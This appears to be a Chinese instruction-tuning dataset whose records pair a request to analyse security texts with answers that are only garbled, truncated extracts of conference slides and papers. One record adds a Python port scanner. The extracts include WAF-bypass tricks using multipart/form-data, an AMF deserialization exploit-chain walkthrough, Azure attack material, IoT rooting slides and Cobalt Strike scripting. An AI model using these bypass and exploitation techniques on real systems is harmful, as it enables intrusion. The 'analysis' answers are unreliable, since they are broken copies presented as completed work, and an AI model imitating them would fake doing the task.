{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napt-get install binfmt-support qemu-user-static qemu qemu-system 1.  QEMU 0x00 QEMU 0x01 QEMU  cp $(which qemu-aarch64-static) ./ sudo chroot . ./qemu-aarch64-static ./bin/ls  2.   1.  apt-get install bridge-utils uml-utilities 0x02 QEMU brctl addbr br0 #br0bridge brctl addif br0 eth0 #br0eth0 brctl stp br0 on #br0STP dhclient br0 #br0 sudo sh qemu-bridge.sh  #!/bin/bash #This is a qemu-ifup script for bridging. #You can use it when starting a KVM guest with bridge mode network. #set your bridge name switch=br0 if [ -n \"$1\" ]; then #create a TAP interface; qemu will handle it automatically. #tunctl -u $(whoami) -t $1 #start up the TAP interface ip link set $1 up sleep 1 #add TAP interface to the bridge brctl addif ${switch} $1 exit 0 else echo \"Error: no interface specified\" exit 1 fi 2.qemu     sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd ,file=debian_wheezy_armhf_standard.qcow2 -append \"root=/dev/mmcblk0p2\" -m 256 -net nic -net tap,ifname=tap1,script=/e tc/qemu-ifup,downscript=no  ctl+option+g   sudo route del -net 10.211.55.0 netmask 255.255.255.0 gw 0.0.0.0 dev eth0 sudo route add -net 10.211.55.5 netmask 255.255.255.255 gw 0.0.0.0 dev br0  0x03  sudo apt-get install nfs-kernel-server  sudo systemctl start nfs-server.service mount -t nfs 10.211.55.3:/home/mbp/workstation/iot /mnt  2. img sudo qemu-system-x86_64 -hda debian_squeeze_amd64_standard.qcow2 -smp 2 -m 1024 -net nic -net tap,ifname=tap1,script= /etc/qemu-ifup,downscript=no -drive file=./share.img //-driveimg dd if=/dev/zero of=share.img bs=1M count=1024 1G sudo mkfs.ext4 share.img ext4 mkdir mntcode sudo mount share.img mntcode sudo cp -rfp targetfs/ mntcode/ sudo unmount mntcode sudo e2fsck -p -f share.img sudo resize2fs -M share.img sudo qemu-system-x86_64 -hda debian_squeeze_amd64_standard.qcow2 -smp 2 -m 1024 -net nic -net tap,ifname=tap1,script= /etc/qemu-ifup,downscript=no -drive file=./share.img mount -t proc /proc proc/ mou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfox-it.com Pwning your Azure environment Dirk-jan Mollema / @_dirkjan Im in your cloud - Lives in The Netherlands - Hacker / Red Teamer / Researcher @ Fox-IT since 2016 - Author of several Active Directory tools - Mitm6 - ldapdomaindump - BloodHound.py - aclpwn.py - Co-author of ntlmrelayx - One of the MSRC Most Valuable Security Researchers 2018/2019 - Blogs on dirkjanm.io - PrivExchange - Tweets stuff on @_dirkjan Whoami  Azure AD: what is it and how to talk to it  Azure AD roles, applications and service principals  Fun with MFA  Linking up cloud and on-premise  Azure Resource manager and Azure AD  Azure integrations  Azure DevOps This talk  Azure Active Directory (Azure AD) is Microsofts cloud-based identity and access management service.  Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it. Azure AD Azure AD Azure AD vs Active Directory (Windows Server) Active Directory Azure Active Directory LDAP REST APIs NTLM/Kerberos OAuth/SAML/OpenID/etc Structured directory (OU tree) Flat structure GPOs No GPOs Super fine-tuned access controls Predefined roles Domain/forest Tenant Trusts Guests  Portal  PowerShell modules  Azure CLI  APIs Interacting with Azure AD  Nice and shiny  Built for ease of use  Sucks if youre trying to understand how stuff actually works Portal  MSOnline PowerShell module  Focusses on Office 365  Some Office 365 specific features  AzureAD PowerShell module  General Azure AD  Different feature set  Azure CLI / Az powershell module  More focus on Azure Resource Manager Powershell  Azure AD Graph  Microsoft Graph  Exchange Provisioning service APIs  All of them have limitations  Unique features, yet deprecated  Different authentication methods supported  Different terminology Which one to use? Confusion  There is not one uniform way to talk to Azure AD  Youre limited to what Microsoft considers important and documents  Most of this research is from using documented and undocumented APIs Talking to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nManaging Your Own Security Career Mike Murray & Lee Kushner mmurray@episteme.ca Lee@LJKushner.com How to be happy, challenged and well-compensated Who Are We?  Lee Kushner  Over 10 years of Success Recruitment of Information Security Professionals  Founder and CEO of the Leading Information Security Recruitment Firm, LJ Kushner and Associates LLC  Wide Range of Nationally Based Clients from Fortune 500s to security product vendors  Mike Murray  Security professional with a decade of experience, currently Director of Neohapsis Labs  Security blogger (Episteme.ca) specializing in talking about security careers, author of the book Forget the Parachute, Let Me Fly the Plane  Has managed security teams and helps people working with him develop the career that they really want to have.  Different perspectives on Careers Outline  Introduction  Do you want a career or just a job?  Your Career Path  Taking Ownership  Nobodys going to do it for you  Personal Branding and Networking  Making the Most of Your Current Role  Good vs. Bad Reasons to Change Jobs  When its really time for a change... Your Career Path  What does a security career look like?  Is it really different than a normal IT career?  Hint: the answer is yes.  What are your short term goals?  What are your long term goals?  Building a career path  Quote: No plan survives... Owning Your Career  Nobodys going to do this for you.  Its not your boss job.  Taking stock of your own skills.  How to be honest with yourself.  How do those skills match up...  To what you want to do now?  To your short and long term goals?  How can you fill those gaps? Your Personal Brand  Personal Branding is such a cheesy term  But its the most important thing you can do.  How do you create a brand?  Play the Word Association game  Your brand comes from.... PEOPLE  Building a network of the right people  Ultimately, the network IS your brand.  How to make friends. Making the Most of Where You Are  Your current job is the best one you have.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "生成一个简单的端口扫描脚本", "input": "使用Python，扫描常见端口", "output": "以下是一个Python端口扫描脚本：\n\n```python\nimport socket\nfrom threading import Thread\n\ndef scan_port(host, port):\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(1)\n        result = sock.connect_ex((host, port))\n        if result == 0:\n            print(f'Port {port}: Open')\n        sock.close()\n    except:\n        pass\n\ndef main():\n    host = '127.0.0.1'\n    common_ports = [21, 22, 23, 25, 53, 80, 110, 443, 993, 995]\n    \n    for port in common_ports:\n        thread = Thread(target=scan_port, args=(host, port))\n        thread.start()\n\nif __name__ == '__main__':\n    main()\n```\n\n注意：此脚本仅用于授权的安全测试。", "category": "tool_generation", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBRAIN GAMES Make your own Biofeedback Video Game Ne0nRa1n That Strange Little 'Brain Girl' Joe Grand aka Kingpin www.kingpinempire.com What is old is new again! Interest in the human brain has been around for a very long time. The first known writing on the brain is found in ancient Sumerian records from 4000 B.C, where an anonymous writer describes the euphoric mind-altering sensations caused by ingesting the common poppy plant. Although our theories about human behavior have changed radically over the many years since, the methods of studying the brain until very recently had changed very little. The evolution of microcomputers, miniaturization, and digital technology has changed everything as they lead us to technological advances that help us understand the human brain better. And now as computers and electronics have become more affordable; a whole do-it-yourself neurohacking movement has emerged. Biofeedback might sound like a throwback to the 60's and 70's - like 8 track tapes, bell bottoms or disco; but it is making a comeback. And it is no surprise in this fast- paced age where everyone seem to be trying to harness their mind/body connection for all it is worth. Biofeedback The definition of biofeedback The technique of using monitoring devices to obtain information about an involuntary function of the central or autonomic nervous system, such as body temperature or blood pressure, in order to gain some voluntary control over the function. Using biofeedback, individuals can be trained to respond to abnormal measurements in involuntary function with specific therapeutic actions, such as muscle relaxation, meditation, or changing breathing patterns. Biofeedback has been used to treat medical conditions such as hypertension and chronic anxiety. The American Heritage Science Dictionary Published by Houghton Mifflin Company. All rights reserved.,  2002 by Houghton Mifflin Company. The definition of biofeedback The technique of using monitoring devices to obtain ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安服崽笔记_flex-messaging-core-4.7.2.jar AMF 反序列化 AMF 反序列化常用的利用链有 MetaDataEntryReplicatedTree 和 UnicastRef 等等 Externalizable 实现类 本次主要记录 MetaDataEntry 利用链 文章写的异常垃圾凌乱跟着代码看文章可能会好一些 代码里很多父类引用指向子类对象的地方我都有说明为什么会调用某个实现类的方法 Src 目录下 Test.java可以辅助了解 amf 协议格式 靶场地址https://github.com/jiashaoxiong1998/amfDemo 导入 idea配置个 tomcat应该就可以执行 或者直接 mvn -package 打成 war 包扔 tomcat 里就行 组件介绍 AMF(Action Message Format)是 Flash 与服务端通信的一种常见的二进制编码模式AMF 是 Adobe 独家开发的数据封装格式Flash 可以直接访问由于它是基于二进制的数据传输 所以相对于 xml SOAPjsonwebService 等基于字符串的数据格式有数据体积小和效率 高的特点AMF 目前有 AMF0 和 AMF3 两种格式flash8 以前版本只支持 AMF0flash9 支 持两种格式AMF3 比 AMF0 效率更高 java 语言编写的网站前端使用 flash 时或部分功能需要前端 flash 和后端有数据交互时 有很大概率会存在 AMF3 反序列化漏洞 代码层面特征 使用小于等于 flex-messaging-core-4.7.2.jar 组件搭建 AMF 协议通信的 flex 应用一般都会 有如下特征 1存在 flex-messaging-core 小于 4.7.3 版本依赖 2定义 class 为flex.messaging.MessageBrokerServlet 的 servlet 例如下图配置 3通过配置文件或代码中动态添加 amf 的 channels 请求端点 例如下图配置配置了/test/amf 的 channels 漏洞代码分析 AMF 协议部分 根据 web.xml 中 MessageBrokerServlet 配置查看 servlet 代码 flex/messaging/MessageBrokerServlet.java 重点关注源码中 service 方法主要关注以下部分 1306 行将 request 对象存到 threadLocal 中 2346 行根据 servletPath 获取 endpoint getServletPath 方法当请求 url 为127.0.0.1/dou/xiang/niu/pi 时 getServletPath 方法获取到的值为/niu/pi,根据此路径去寻找对应 amf 的请求端点 3373 行调用根据 servletPath 找到的 endpoint 对象的 service 方法此方法触发漏洞 EndPoint 是接口类型有很多实现类靶场中定义的实现类是 BaseHTTPEndpoint因为 Web.xml 中指定配置文件参数 services.configuration.file 参数为 services-config.xml services-config.xml 中 endpoint 标签配置的 url 为 http://{server.name}:{server.port}/{context.root}/test/amf class 为 flex.messaging.endpoints.AMFEndpoint AMFEndpoint 类继承 BasePollingHTTPEndpoint 类 BasePollingHTTPEndpoint 继承 BaseHTTPEndpoint 类 这不是主要执行流程不贴图了就为了明白为什么会调用 BaseHTTPEndpoint 类的 service 方法 BaseHTTPEndpoint 类的 service 方法调用 filterChain 对象的 invoke 方法 从 BaseHTTPEndpoint 类的 start 方法中看到filterChain 对象是通过调用 createFilterChain 方法进行初始化 BaseHTTPEndpoint 类中的 createFilterChain 为抽象方法 通过查看子类 AMFEndpoint 类中的 createFilterChain 实现方法可以确定 filterChain.invoke 方法首先会调用 SerializationFilter 的 invoke 方法这不是主要执行流程不贴图了就为了 明白为什么会", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrage against the Suggy (AKA Chris Sumner), Online Privacy Foundation, DEF CON 25 Draft: V0.2  Updated slides (with notes) will be available shortly after DEF CON machine 2011 2011 2012 2011 2012 2013 2011 2012 2013 2016 1. Why are people so divided? Nothing to Hide, Nothing to Fear BLACK & WHITE Gr Grey Grey Grey Grey Grey Grey Grey Grey Grey Grey Grey Grey Grey Grey Grey Vs Vs Vs Vs Vs Nature provides a first draft, which experience then revises (Marcus, 2004) The F-Scale and RWA Scale The F-Scale and RWA Scale Homosexuals and feminists should be praised for being brave enough to defy traditional family values. Vs obedience good manners respect for elders to be well-behaved Most important for a child to have? Vs Vs Vs Vs self-reliance curiosity independence to be considerate obedience good manners respect for elders to be well-behaved Most important for a child to have? Vs Vs Vs Study 1 Surveys over time A1 A2 B1 B2 March April May 175 998 663 576 N = 2,412 You have nothing to fear, if you have nothing to hide A1 B1 A2 B2 A1 B1 A2 B2 A1 B1 A2 B2 It is acceptable that immigrants and visitors from potentially dangerous countries should have to reveal their social media accounts passwords to UK border agents. A1 B1 A2 B2 The dark net should be shut down A1 B1 A2 B2 Companies should be not be allowed to develop technologies that prevent law enforcement from accessing your online conversations. Surveys over time A1 A2 B1 B2 March April May 175 998 663 576 Effect of attacks Vasilopoulos, P., Marcus, G. E., & Foucault, M. (2015). 0% 10% 20% 30% 40% 50% 60% 70% All Agree with \"nothing to hide\" Support wiretapping Ban encryption Close dark net Pre attack Post attack * ** Survey A1 v A2 0% 10% 20% 30% 40% 50% 60% 70% All Agree with \"nothing to hide\" Support wiretapping Support extreme vetting Pre attack Post attack Survey B1 v B2 (B2 conducted 41 days after attack) Opinions Nothing to hide, nothing to fear Access communications without a warrant Shut down dark net Ban counte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.pwntester.action; import com.opensymphony.xwork2.ActionSupport; import java.io.File; public class FileUploadAction extends ActionSupport { private String contentType; private File upload; private String fileName; private String caption; public String input() throws Exception { return SUCCESS; } public String upload() throws Exception { return SUCCESS; } public String getUploadFileName() { return fileName; } public void setUploadFileName(String fileName) { this.fileName = fileName; } public String getUploadContentType() { return contentType; } public void setUploadContentType(String contentType) { this.contentType = contentType; } public File getUpload() { return upload; } public void setUpload(File upload) { this.upload = upload; } public String getCaption() { return caption; } public void setCaption(String caption) { this.caption = caption; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n腾讯 WAF 挑战赛回忆录 by do9gy Part 0 应各位好友诚挚邀请分享一下 WAF Bypass 相关的技巧其实本来应该在比赛结束就 跟大家分享无奈于 TSRC 那边对各位师傅提交的 Bypass 尚未统一修复一直推迟到今日 本文披露的相关技术信息已经得到 TSRC 有关方面的许可且隐藏了相关 POC 的内容只 分享技术原理及绕过思路希望能够起到抛砖引玉的作用 首先谈一下 WAFWeb 应用防火墙主要用途是对 HTTPs协议进行校验拦截恶 意的攻击请求放行正常的业务请求从架构来看主要分为网络层应用层云 WAF 三 类从绕过来看分为通用型绕过和单一规则绕过通用型绕过即完全绕过 WAF 防护一 旦产生绕过后可以利用该 Payload 实现任意一种攻击而单一规则绕过则仅能够绕过特 定规则例如SQL 注入规则中使用 select-1.1from来绕过 select\\b[\\s\\S]*\\bfrom 这一 正则规则绕过以后仅能够实现 SQL 注入攻击我所致力研究的属于前者 从网络层应用层云 WAF 三类场景来看他们的绕过思路也有所区别例如对于传 统的网络层 WAF采用 chunked 编码即可绕过目前多数 WAF 厂商已经修复但是我们仍 然可以在网络层发包这一方向进行尝试和探索对于应用层 WAFWAF 的处理引擎是经过 前端 Nginx 或 Apache大多数场景都是 Nginx 及 Tengine完成 HTTP 协议初步解析以后 再转发给 WAF 处理引擎的因而一些网络层组包的技术是无法绕过的那么就需要我们去 研究对于一个 HTTP 请求Nginx 解析了什么内容交给后面的 PHPASP 又解析了什么 内容 本文介绍的思路主要围绕 multipart/form-data主要针对于 POST 参数的对于漏洞 点在 GET 参数位置则用处不大 1. multipart/form-data 我们知道HTTP 协议 POST 请求除了常规的 application/x-www- form-urlencoded 以外还有 multipart/form-data 这种形式主要是为了解决上传文件场景 下文件内容较大且内置字符不可控的问题multipart/form-data 格式也是可以传递 POST 参 数的对于 Nginx+PHP 的架构Nginx 实际上是不负责解析 multipart/form-data 的 body 部 分的而是交由 PHP 来解析因此 WAF 所获取的内容就很有可能与后端的 PHP 发生不一 致 以 PHP 为例我们写一个简单的测试脚本 ``` <?php echo file_get_contents(\"php://input\"); var_dump($_POST); var_dump($_FILES); ?> ``` 此时我们将其转为 multipart/form-data 格式 可以看到实际上和前一种 urlencoded 是达到了同一种效果参数并没有进入$_FILES 数组而是进入了$_POST 数组那么何时是上传文件何时是 POST 参数呢这个关键 点在于有没有一个完整的 filename=这 9 个字符是经过反复测试的缺一个字符不可替 换一个字符也不可在其中添加一个字符更不可 加上了 filename=以后的效果 Bypass WAF 的核心思想在于一些 WAF 产品处于降低误报考虑对用户上传文件的内 容不做匹配直接放行事实上这些内容在绝大多数场景也无法引起攻击但关键问题在 于WAF 能否准确有效识别出哪些内容是传给$_POST 数组的哪些传给$_FILES 数组如 果不能那我们是否就可以想办法让 WAF 以为我们是在上传文件而实际上却是在 POST 一个参数这个参数可以是命令注入SQL 注入SSRF 等任意的一种攻击这样就实现了 通用 WAF Bypass Part 1 下面我们来看一下几种入门级的绕过思路 1. 0x00 截断 filename 注意在 filename 之前加入了 0x00而有些 WAF 在检测前会删除 HTTP 协议中的 0x00 这样就导致了 WAF 认为是含有 filename 的普通上传而后端 PHP 则认为是 POST 参数 2. 双写上传描述行 双写后一些 WAF 会取第二行而实际 PHP 会获取第一行 3. 双写整个 part 开头部分 此时该参数会引入一些垃圾数据在命令注入及 SQL 注入的攻击场景需要尽可能 将前面的内容闭合 4. 构造假的 part 部分 1 该方法与前一种类似 5. 构造假的 part 部分 2 注意这里比前一种少了一个换行数据纯净了许多 6. 两个 boundary 对于 php 来说真正的 boundary 是 a  7. 两个 Conte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvisory. New Sandworm malware Cyclops Blink replaces VPNFilter Version 1.0 23 February 2022  Crown Copyright 2022 New Sandworm malware Cyclops Blink replaces VPNFilter The Sandworm actor, which the UK and US have previously attributed to the Russian GRU, has replaced the exposed VPNFilter malware with a new more advanced framework. Background The UK National Cyber Security Centre (NCSC), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) in the US have identified that the actor known as Sandworm or Voodoo Bear is using a new malware, referred to here as Cyclops Blink. The NCSC, CISA, NSA and FBI have previously attributed the Sandworm actor to the Russian GRUs Main Centre for Special Technologies GTsST. The malicious cyber activity below has previously been attributed to Sandworm:  The BlackEnergy disruption of Ukrainian electricity in 2015  Industroyer in 2016  NotPetya in 2017  Attacks against the Winter Olympics and Paralympics in 20181  A series of disruptive attacks against Georgia in 20192 Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. 1https://www.ncsc.gov.uk/news/uk-and-partners-condemn-gru-cyber-attacks-against-olympic-an-paralympic-games 2 https://www.gov.uk/government/news/uk-condemns-russias-gru-over-georgia-cyber-attacks This advisory summarises the VPNFilter malware it replaces, and provides more detail about Cyclops Blink, as well as the associated tactics, techniques and procedures (TTPs) used by Sandworm. An NCSC malware analysis report on Cyclops Blink is also available and can be read in parallel. It also points to mitigation measures to help organisations that may be affected by this malware. VPNFilter First exposed in 2018 A series of articles published by Cisco Talos in 20181 descri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA\"GTVHACKER\"PRODUCTION\" GTVHACKER\"PRESENTS: GTVHacker\"  Formed'to'root'the'original' Google'TV'in'2010'  Released'exploits'for'every' Google'TV'device'  Plus'some'others:' Chromecast,'Roku,'Nest'  Many'more'to'come!'' Speaking\"Members\" Amir\"Etemadieh\"(@Zenofex)\"'Research'ScienHst'at'Accuvant' LABS,'founded'GTVHacker'\" \" CJ\"Heres\"(@\"cj_000)\"'Security'Researcher'/'Group'Head,' Technology'Development'[somewhere]'' ' Hans\"Nielsen\"(AgentHH)\"'Senior'Security'Consultant'at' Matasano'' ' Mike\"Baker\"([mbm])\"'Firmware'developer,'OpenWRT'coT founder' Other\"Members\" gynophage\"\"He's'(again)'running'a'liXle'thing'called'the' DEFCON'CTF'right'now'' ' Jay\"Freeman\"(saurik)\"\"Creator'of'Cydia'' ' Khoa\"Hoang\"(maximus64)\"\"\" ' ' Tom\"Dwenger\"(tdweng)\"'Excellent'with'APK'reversing'and' anything'Java'' Why\"Hack\"ALL\"The\"Things?\"  We'own'the'hardware,'why' not'the'so\\ware?''  Give'new'life'to'abandoned' hardware''  Make'the'product'beXer'  We'enjoy'the'challenge'' Takeaways\"  You'get'a'root!'  You'get'a'root!'  You'get'a'root!'  Everybody'gets'a' root!' Learning'is'awesome,'but'this'presentaHon'is'about'the' Avenues\"Of\"A]ack\" UART\"  'Interacts'with'debug'ports'on' board.'  'One'wire'for'transmit'(TX),'one' wire'for'receive'(RX),'one'wire'for' ground'  'Work'at'different'voltage'levels,' for'example:'1.8V,'3.3V,'5V'  'Free'UART'adapters'at'the'end!' Universal\"Asynchronous\"Receiver/Transmi]er\" Epson Artisan 700/800 (Printer) ARM' Linux'2.6.21Tarm1' Device' 1' ' Networked all-in- one photo printer / scanner' Epson Artisan 700/800 (Printer) Device' 1' Epson Artisan 700/800 (Printer) UART Device' 1'  BooHng'with' UART'connected' drops'to'special' console.'  Console'has'root' command' execuHon'as'a' feature' Belkin Wemo Device' 2' ' Internet Controlled Wall Plug Multiple exploits in the past year Belkin Wemo Device' 2' ' Belkin Wemo  UART'was'patched,'according'to'the' Internet.'Not'enHrely'true!'  SHll'accepts'commands'for'two'seconds'in' recovery.'  Run'this'command'at'the'right'moment:' kill$%9$$", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUsing GPS Spoofing to Control Time Dave/Karit (@nzkarit)  ZX Security Defcon 2017 www.zxsecurity.co.nz @nzkarit Dave, Karit, @nzkarit Security Consultant at ZX Security in Wellington, NZ Enjoy radio stuff Pick Locks and other physical stuff at Locksport whoami 2 www.zxsecurity.co.nz @nzkarit 3 www.zxsecurity.co.nz @nzkarit GPS (Global Positioning System) GPS Spoofing on the cheap Lets change the time! So what? Attacking NTP Servers How we can detect spoofing Today 4 www.zxsecurity.co.nz @nzkarit Tells us where we are Tells us the time GPS 5 www.zxsecurity.co.nz @nzkarit Anyone in the room not currently trust GPS locations? Anyone in the room not currently trust GPS time? Anyone feel that this will change by the end of the talk? We Trust GPS Right? Right????? 6 www.zxsecurity.co.nz @nzkarit GPS too important to life? GPS must be great and robust? Right? Important services rely on it: Uber Tinder You have to trust it right? 7 www.zxsecurity.co.nz @nzkarit NTP Time Source Plane Location Ship Location Tracking Armoured Vans Taxi law in NZ no longer knowledge requirement And some other things as well 8 www.zxsecurity.co.nz @nzkarit So why dont I trust it? 9 www.zxsecurity.co.nz @nzkarit Have GPS jammers to mess with Uber Black Cabs in London 10 www.zxsecurity.co.nz @nzkarit Jammers Boring 11 www.zxsecurity.co.nz @nzkarit Nation State 12 www.zxsecurity.co.nz @nzkarit A University 13 www.zxsecurity.co.nz @nzkarit The Chinese are in the NTPs 14 www.zxsecurity.co.nz @nzkarit Now we are talking 15 www.zxsecurity.co.nz @nzkarit A box An SDR with TX I used a BladeRF HackRF USRP So less US$500 in hardware Also some aluminium foil to make a Faraday Cage So it is now party trick simple and cheap This is the big game changer from the past What we need 16 www.zxsecurity.co.nz @nzkarit Setup 17 www.zxsecurity.co.nz @nzkarit Make sure you measure signal outside to ensure none is leaking Be careful @amm0nra patented Faraday Cage 18 www.zxsecurity.co.nz @nzkarit INAL (Im not a lawyer) G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(U) I hunt TR-069 admins Shahar Tal TOP SECRET//SI//REL TO DC22 no ISPs were harmed during the making of this presentation corporate legal wouldn't let us  Shahar Tal (@jifa)  Father, husband, geek  10 years with IDF obligatory whoami Residential Gateway Security  It sucks.  Pedro Joaquin (Routerpwn), Jacob Holcomb (So hopelessly broken), Zachary Cutlip (rooting SOHO), devtty0 (D-Link joels backdoor and more) TR-069 in 69 seconds CPE WAN Management Protocol (CWMP/TR-069) TR-069 (cont.) SOAP RPC (XML over HTTP) Always* initiates session Dual authentication mechanism TR-069 Example RPC (ACSCPE) <soapenv:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:cwmp=\"urn:dslforum-org:cwmp-1-0\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> <soapenv:Header> <cwmp:ID soapenv:mustUnderstand=\"1\">1337069</cwmp:ID> </soapenv:Header> <soapenv:Body> <cwmp:SetParameterValues> <ParameterList soap:arrayType=\"cwmp:ParameterValueStruct[1]\"> <ParameterValueStruct> <Name>InternetGatewayDevice.ManagementServer.URL</Name> <Value xsi:type=\"xsd:string\">http://acs.supersecureisp.com/cwmp/</Value> </ParameterValueStruct> </ParameterList> <ParameterKey>1337069</ParameterKey> </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> <soap:Body> <cwmp:Inform> <DeviceId> <Manufacturer>Secure-Devices-R-Us</Manufacturer> <OUI>001337</OUI> <ProductClass>IGD</ProductClass> <SerialNumber>123456789</SerialNumber> </DeviceId> <Event soap-enc:arrayType=\"cwmp:EventStruct[1]\"> <EventStruct> <EventCode>2 PERIODIC</EventCode> <CommandKey /> </EventStruct> </Event> <MaxEnvelopes>1</MaxEnvelopes> <CurrentTime>2014-08-09T01:49:14+00:00</CurrentTime> <RetryCount>0</RetryCount> <ParameterList soap-enc:arrayType=\"cwmp:ParameterValueStruct[6]\"> <ParameterValueStruct> <Name>Device.DeviceSummary</Name> <Value xsi:type=\"xsd:string\" /> </ParameterValueStruct> <ParameterValueStruct> <Name>De", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthorz3r0yu CobaltStrike 插件开发 目录 CONTENTS 1. 概述 2. Sleep 语言相关 3. Aggressor Script 相关 4. 总结 概 述 01 CobaltStrike 插件的编写主要是使用agscriptAggressor Script这个CobaltStrike 3.0之后内置的脚 本语言agscript是基于 Sleep 语言进行二次开发的Sleep 是一种深受Perl启发的基于Java的脚本语言 所以在开始编写 CobaltStrike 之前我们必须要了解 Sleep 语言的语法和agscript中内置的各种函数 Sleep 开发手册 http://sleep.dashnine.org/manual/ agscript 开发手册 https://trial.cobaltstrike.com/aggressor-script/index.html 01 概述 Sleep 语言相关 02 1.1 Sleep 强制要求语句之间要包含空格 1.2 warn 函数助力debug warn可以详细的输出对应代码的错误信息可以帮助你定位有问题的地方当然使用熟悉的println也是可以的 PS: getStackTrace() 可以获取函数的调用栈 1.3 debug 函数输出详细的debug信息 1. 注意事项 2.1 常见变量 使用@和字符即可创建数组和字典数组和字典不仅可以引用其他数组和字典还可以可以引用自己 Sleep会插入双引号的字符串这意味着以$符号开头的任何以空格分隔的标记都将替换为其值注意 $+号可以用于将 插字符串与另一个值连接起来 2.1 常见变量 (1) 数组操作 -创建 注意这里赋值给的是 $a 变量而 stackqueue和 list类型的变量都是 @a 是 @ 符号开头的 2.2 常见对变量的操作 (1) 数组操作 - 遍历数组 - 添加和删除元素 2. 2 常见对变量的操作 (2) 字典操作 - 创建 - 删除字典的某个key 2. 2 常见对变量的操作 (2) 字典操作 - 遍历字典 2. 2 常见对变量的操作 (3) Stacks栈操作 -- 先入后出类型 - 入栈操作 - 出栈操作 2. 2 常见对变量的操作 (4) Queues堆操作 -- 先入先出类型 2. 2 常见对变量的操作 (5) List 操作 -- 可以切片 2. 2 常见对变量的操作 (6) 字符串操作 --基础操作 2. 2 常见对变量的操作 (6) 字符串操作 --逻辑操作 2. 2 常见对变量的操作 (1) 逻辑连接词 2. 3 常见逻辑操作 (2) 类型判断关键词 2. 3 常见逻辑操作 (3) if 语句 --常规 2. 3 常见逻辑操作 (3) if 语句 --iff操作符 2. 3 常见逻辑操作 (4) 循环语句 -- while 循环 2. 3 常见逻辑操作 (4) 循环语句 -- for 循环 2. 3 常见逻辑操作 (4) 循环语句 -- foreach循环 2. 3 常见逻辑操作 (5) 异常处理 -- throw 语句 2. 3 常见逻辑操作 (5) 异常处理 -- warn 语句 2. 3 常见逻辑操作 (5) 异常处理 --异常捕获 2. 3 常见逻辑操作 使用sub字符即可声明函数传给函数的参数标 记为$1,$2,一直到$n函数可以接受无数个参 数 变量@_是一个包含所有参数的数组$1 $2等变量的更改将改变@_的内容 2.4 函数创建与调用 2.5 文件操作 AgScript 相关 03 VSCode + Cobalt Strike Aggressor Script 插件@Twi1ight 3.1 开发环境 3.2交互式的脚本控制台使用 3.2交互式的脚本控制台使用 如果想命令行直接执行脚本的话可以使用如下命令 3.2交互式的脚本控制台使用 比如这里我在 headless cobaltstrike 的模式下之行一个脚本并获取输出 2.1 ready 事件 当这个CobaltStrike客户端连接到团队服务器并准备采取行动时触发常用于测试一些功能的时候比如下列脚本是一 个测试 foreach 语句的脚本我们常用 agscript 来启动 headless 模式的 CobaltStrike 进行测试 3.3 aggressor脚本中常用的内置事件和函数 2.2 command 关键字 你可以使用command关键字来注册命令注册之后的命令可以通过控制台接收来自用户的输入来触发 示例代码 执行效果 3.3 aggressor脚本中常用的内置事件和函数 2.3 指定颜色 如果你想给Cobalt Strike的控制台添加一些色彩通过\\c\\U和\\o转义即可告诉", "category": "text_analysis", "source": "security_papers"}
